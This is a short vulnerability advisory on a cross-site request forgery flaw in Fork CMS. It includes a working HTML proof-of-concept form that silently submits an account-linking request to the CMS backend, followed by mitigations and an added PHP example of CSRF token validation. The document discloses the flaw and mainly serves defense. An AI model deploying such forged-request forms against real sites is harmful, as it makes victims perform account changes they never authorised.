====================================================================================

Fork-CMS CSRF:

Introduction

Author: Rafay Baloch

CSRF or XSRF (cross-site request forgery) occurs when an attacker forces
the victim's browser to send a forged request, making the victim perform
a particular action. Any form that lacks a CSRF token is vulnerable to it.

Impact:

An attacker can accomplish multiple things; he could change the victim's
form details, etc.


PROOF OF CONCEPT:

The above two forms are missing CSRF tokens:


The form is missing a CSRF token, which means that an attacker can force
a user to link to a Campaign Monitor account.

http://demo.fork-cms.com/private/en/mailmotor/settings?token=true#tabSettingsAccount

POC:

<html>

  <body>
    <form action="http://demo.fork-cms.com/backend/ajax.php" method="POST">
      <input type="hidden" name="fork&#91;module&#93;" value="mailmotor" />
      <input type="hidden" name="fork&#91;action&#93;"
value="link&#95;account" />
      <input type="hidden" name="fork&#91;language&#93;" value="en" />
      <input type="hidden" name="url" value="www&#46;google&#46;com" />
      <input type="hidden" name="username" value="rafaybaloch" />
      <input type="hidden" name="password" value="" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>

http://demo.fork-cms.com/private/en/settings/email
http://demo.fork-cms.com/backend/ajax.php

Mitigations:

- Reauthenticate the user when he performs an important action on his
account, e.g. deleting a user, deleting himself, etc.
- Add a CSRF token to each and every request and make sure that it is
validated on the server.
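
The second mitigation as an added example (not part of the original advisory and not Fork CMS code): a session-bound token is issued once, then checked on every state-changing POST, and the fields from the PoC form above are run through the check. The function names and the "csrf_token" field name are hypothetical, and the session is passed as a plain array so the script runs from the PHP CLI.

```php
<?php
// Added example: session-bound CSRF token check for a state-changing POST.
// Function names and the "csrf_token" field are hypothetical, not Fork CMS code.

/** Create the per-session token once and return it for embedding in forms. */
function csrf_issue(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32)); // 256-bit CSPRNG value
    }
    return $session['csrf_token'];
}

/** True only for a POST whose token matches the one stored in this session. */
function csrf_check(array $session, string $method, array $post): bool
{
    if ($method !== 'POST') {
        return false; // state changes are never accepted over GET
    }
    $expected  = $session['csrf_token'] ?? '';
    $submitted = $post['csrf_token'] ?? '';
    if (!is_string($expected) || !is_string($submitted) || $expected === '') {
        return false; // a missing or non-string token fails closed
    }
    return hash_equals($expected, $submitted); // constant-time comparison
}

// Constructed sample data: the victim's session and the fields of the PoC form.
$victimSession = [];
$token = csrf_issue($victimSession);
$forged = [
    'fork' => ['module' => 'mailmotor', 'action' => 'link_account', 'language' => 'en'],
    'url' => 'www.google.com', 'username' => 'rafaybaloch', 'password' => '',
];
$otherSession = [];
$otherToken = csrf_issue($otherSession); // token that belongs to another session

$cases = [
    'cross-site form, no token'          => $forged,
    'token from a different session'     => $forged + ['csrf_token' => $otherToken],
    'token sent as an array'             => $forged + ['csrf_token' => [$token]],
    'legitimate form with session token' => $forged + ['csrf_token' => $token],
];
foreach ($cases as $label => $post) {
    $ok = csrf_check($victimSession, 'POST', $post);
    printf("%-36s %s\n", $label, $ok ? 'accepted' : 'rejected');
}
```

Only the last case is accepted; the first three are rejected because the submitted token is absent, belongs to another session, or is not a string.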